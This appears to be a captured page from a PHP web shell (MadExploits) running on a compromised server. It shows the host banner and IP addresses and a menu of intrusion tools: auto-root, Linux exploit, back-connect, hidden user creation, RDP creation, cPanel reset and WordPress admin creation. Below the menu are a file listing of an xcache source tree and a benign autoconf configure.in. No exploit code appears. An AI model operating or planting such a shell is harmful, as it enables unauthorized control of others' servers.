Linux server.kiran-academy.com 3.10.0-1160.108.1.el7.x86_64 #1 SMP Thu Jan 25 16:17:31 UTC 2024 x86_64
Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
: 194.233.91.196 | : 216.73.216.172
Cant Read [ /etc/named.conf ]
7.4.32
finalho
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
local /
src /
xcache-3.2.0 /
[ HOME SHELL ]
Name
Size
Permission
Action
.libs
[ DIR ]
drwxr-xr-x
autom4te.cache
[ DIR ]
drwxr-xr-x
bin
[ DIR ]
drwxrwxr-x
build
[ DIR ]
drwxr-xr-x
devel
[ DIR ]
drwxrwxr-x
htdocs
[ DIR ]
drwxrwxr-x
include
[ DIR ]
drwxr-xr-x
lib
[ DIR ]
drwxrwxr-x
mod_assembler
[ DIR ]
drwxrwxr-x
mod_cacher
[ DIR ]
drwxrwxr-x
mod_coverager
[ DIR ]
drwxrwxr-x
mod_decoder
[ DIR ]
drwxrwxr-x
mod_disassembler
[ DIR ]
drwxrwxr-x
mod_encoder
[ DIR ]
drwxrwxr-x
mod_optimizer
[ DIR ]
drwxrwxr-x
modules
[ DIR ]
drwxr-xr-x
processor
[ DIR ]
drwxrwxr-x
tests
[ DIR ]
drwxrwxr-x
util
[ DIR ]
drwxrwxr-x
xcache
[ DIR ]
drwxrwxr-x
.deps
0
B
-rw-r--r--
AUTHORS
26
B
-rw-rw-r--
COPYING
1.47
KB
-rw-rw-r--
ChangeLog
11.9
KB
-rw-rw-r--
INSTALL
487
B
-rw-rw-r--
Makefile
23.56
KB
-rw-r--r--
Makefile.frag
2.05
KB
-rw-rw-r--
Makefile.frag.deps
5.49
KB
-rw-rw-r--
Makefile.fragments
9.8
KB
-rw-r--r--
Makefile.global
6.6
KB
-rw-r--r--
Makefile.objects
4.77
KB
-rw-r--r--
NEWS
3.51
KB
-rw-rw-r--
README
364
B
-rw-rw-r--
THANKS
385
B
-rw-rw-r--
acinclude.m4
78.62
KB
-rw-r--r--
aclocal.m4
303.59
KB
-rw-r--r--
config.guess
44.02
KB
-rwxr-xr-x
config.h
2.58
KB
-rw-r--r--
config.h.in
2.39
KB
-rw-r--r--
config.log
19.67
KB
-rw-r--r--
config.m4
4.59
KB
-rw-rw-r--
config.nice
118
B
-rwxr-xr-x
config.status
20.82
KB
-rwxr-xr-x
config.sub
34.94
KB
-rwxr-xr-x
config.w32
4.93
KB
-rw-rw-r--
configure
442.56
KB
-rwxr-xr-x
configure.in
4.58
KB
-rw-r--r--
gen_structinfo.awk
3.76
KB
-rwxrwxr-x
includes.c
108
B
-rw-rw-r--
includes.i
413.44
KB
-rw-r--r--
install-sh
0
B
-rw-r--r--
libtool
205.71
KB
-rwxr-xr-x
ltmain.sh
195.05
KB
-rw-r--r--
missing
0
B
-rw-r--r--
mkinstalldirs
0
B
-rw-r--r--
processor.out.c
498.99
KB
-rw-r--r--
run-tests.php
78.1
KB
-rw-r--r--
run-xcachetest
1.34
KB
-rwxrwxr-x
structinfo.m4
74.93
KB
-rw-r--r--
xc_processor.c.h
498.99
KB
-rw-r--r--
xc_processor.h
9.06
KB
-rw-r--r--
xcache-test.ini
656
B
-rw-rw-r--
xcache-zh-gb2312.ini
2.51
KB
-rw-rw-r--
xcache.c
25.44
KB
-rw-rw-r--
xcache.h
709
B
-rw-rw-r--
xcache.ini
3.04
KB
-rw-rw-r--
xcache.la
788
B
-rw-r--r--
xcache.lo
303
B
-rw-r--r--
xcache_globals.h
1.29
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : configure.in
dnl This file becomes configure.in for self-contained extensions. AC_PREREQ(2.59) AC_INIT(config.m4) ifdef([AC_PRESERVE_HELP_ORDER], [AC_PRESERVE_HELP_ORDER], []) PHP_CONFIG_NICE(config.nice) dnl AC_DEFUN([PHP_EXT_BUILDDIR],[.])dnl AC_DEFUN([PHP_EXT_DIR],[""])dnl AC_DEFUN([PHP_EXT_SRCDIR],[$abs_srcdir])dnl AC_DEFUN([PHP_ALWAYS_SHARED],[ ext_output="yes, shared" ext_shared=yes test "[$]$1" = "no" && $1=yes ])dnl dnl test -z "$CFLAGS" && auto_cflags=1 abs_srcdir=`(cd $srcdir && pwd)` abs_builddir=`pwd` AC_PROG_CC([cc gcc]) PHP_DETECT_ICC PHP_DETECT_SUNCC AC_PROG_CC_C_O dnl Support systems with system libraries in e.g. /usr/lib64 PHP_ARG_WITH(libdir, for system library directory, [ --with-libdir=NAME Look for libraries in .../NAME rather than .../lib], lib, no) PHP_RUNPATH_SWITCH PHP_SHLIB_SUFFIX_NAMES dnl Find php-config script PHP_ARG_WITH(php-config,, [ --with-php-config=PATH Path to php-config [php-config]], php-config, no) dnl For BC PHP_CONFIG=$PHP_PHP_CONFIG prefix=`$PHP_CONFIG --prefix 2>/dev/null` phpincludedir=`$PHP_CONFIG --include-dir 2>/dev/null` INCLUDES=`$PHP_CONFIG --includes 2>/dev/null` EXTENSION_DIR=`$PHP_CONFIG --extension-dir 2>/dev/null` PHP_EXECUTABLE=`$PHP_CONFIG --php-binary 2>/dev/null` if test -z "$prefix"; then AC_MSG_ERROR([Cannot find php-config. Please use --with-php-config=PATH]) fi php_shtool=$srcdir/build/shtool PHP_INIT_BUILD_SYSTEM AC_MSG_CHECKING([for PHP prefix]) AC_MSG_RESULT([$prefix]) AC_MSG_CHECKING([for PHP includes]) AC_MSG_RESULT([$INCLUDES]) AC_MSG_CHECKING([for PHP extension directory]) AC_MSG_RESULT([$EXTENSION_DIR]) AC_MSG_CHECKING([for PHP installed headers prefix]) AC_MSG_RESULT([$phpincludedir]) dnl Checks for PHP_DEBUG / ZEND_DEBUG / ZTS AC_MSG_CHECKING([if debug is enabled]) old_CPPFLAGS=$CPPFLAGS CPPFLAGS="-I$phpincludedir" AC_EGREP_CPP(php_debug_is_enabled,[ #include <main/php_config.h> #if ZEND_DEBUG php_debug_is_enabled #endif ],[ PHP_DEBUG=yes ],[ PHP_DEBUG=no ]) CPPFLAGS=$old_CPPFLAGS AC_MSG_RESULT([$PHP_DEBUG]) AC_MSG_CHECKING([if zts is enabled]) old_CPPFLAGS=$CPPFLAGS CPPFLAGS="-I$phpincludedir" AC_EGREP_CPP(php_zts_is_enabled,[ #include <main/php_config.h> #if ZTS php_zts_is_enabled #endif ],[ PHP_THREAD_SAFETY=yes ],[ PHP_THREAD_SAFETY=no ]) CPPFLAGS=$old_CPPFLAGS AC_MSG_RESULT([$PHP_DEBUG]) dnl Support for building and testing Zend extensions ZEND_EXT_TYPE="zend_extension" PHP_SUBST(ZEND_EXT_TYPE) dnl Discard optimization flags when debugging is enabled if test "$PHP_DEBUG" = "yes"; then PHP_DEBUG=1 ZEND_DEBUG=yes changequote({,}) CFLAGS=`echo "$CFLAGS" | $SED -e 's/-O[0-9s]*//g'` CXXFLAGS=`echo "$CXXFLAGS" | $SED -e 's/-O[0-9s]*//g'` changequote([,]) dnl add -O0 only if GCC or ICC is used if test "$GCC" = "yes" || test "$ICC" = "yes"; then CFLAGS="$CFLAGS -O0" CXXFLAGS="$CXXFLAGS -g -O0" fi if test "$SUNCC" = "yes"; then if test -n "$auto_cflags"; then CFLAGS="-g" CXXFLAGS="-g" else CFLAGS="$CFLAGS -g" CXXFLAGS="$CFLAGS -g" fi fi else PHP_DEBUG=0 ZEND_DEBUG=no fi dnl Always shared PHP_BUILD_SHARED dnl Required programs PHP_PROG_RE2C PHP_PROG_AWK sinclude(config.m4) enable_static=no enable_shared=yes dnl Only allow AC_PROG_CXX and AC_PROG_CXXCPP if they are explicitly called (by PHP_REQUIRE_CXX). dnl Otherwise AC_PROG_LIBTOOL fails if there is no working C++ compiler. AC_PROVIDE_IFELSE([PHP_REQUIRE_CXX], [], [ undefine([AC_PROG_CXX]) AC_DEFUN([AC_PROG_CXX], []) undefine([AC_PROG_CXXCPP]) AC_DEFUN([AC_PROG_CXXCPP], [php_prog_cxxcpp=disabled]) ]) AC_PROG_LIBTOOL all_targets='$(PHP_MODULES) $(PHP_ZEND_EX)' install_targets="install-modules install-headers" phplibdir="`pwd`/modules" CPPFLAGS="$CPPFLAGS -DHAVE_CONFIG_H" CFLAGS_CLEAN='$(CFLAGS)' CXXFLAGS_CLEAN='$(CXXFLAGS)' test "$prefix" = "NONE" && prefix="/usr/local" test "$exec_prefix" = "NONE" && exec_prefix='$(prefix)' PHP_SUBST(PHP_MODULES) PHP_SUBST(PHP_ZEND_EX) PHP_SUBST(all_targets) PHP_SUBST(install_targets) PHP_SUBST(prefix) PHP_SUBST(exec_prefix) PHP_SUBST(libdir) PHP_SUBST(prefix) PHP_SUBST(phplibdir) PHP_SUBST(phpincludedir) PHP_SUBST(CC) PHP_SUBST(CFLAGS) PHP_SUBST(CFLAGS_CLEAN) PHP_SUBST(CPP) PHP_SUBST(CPPFLAGS) PHP_SUBST(CXX) PHP_SUBST(CXXFLAGS) PHP_SUBST(CXXFLAGS_CLEAN) PHP_SUBST(EXTENSION_DIR) PHP_SUBST(PHP_EXECUTABLE) PHP_SUBST(EXTRA_LDFLAGS) PHP_SUBST(EXTRA_LIBS) PHP_SUBST(INCLUDES) PHP_SUBST(LFLAGS) PHP_SUBST(LDFLAGS) PHP_SUBST(SHARED_LIBTOOL) PHP_SUBST(LIBTOOL) PHP_SUBST(SHELL) PHP_SUBST(INSTALL_HEADERS) PHP_GEN_BUILD_DIRS PHP_GEN_GLOBAL_MAKEFILE test -d modules || $php_shtool mkdir modules touch .deps AC_CONFIG_HEADER(config.h) AC_OUTPUT()
Close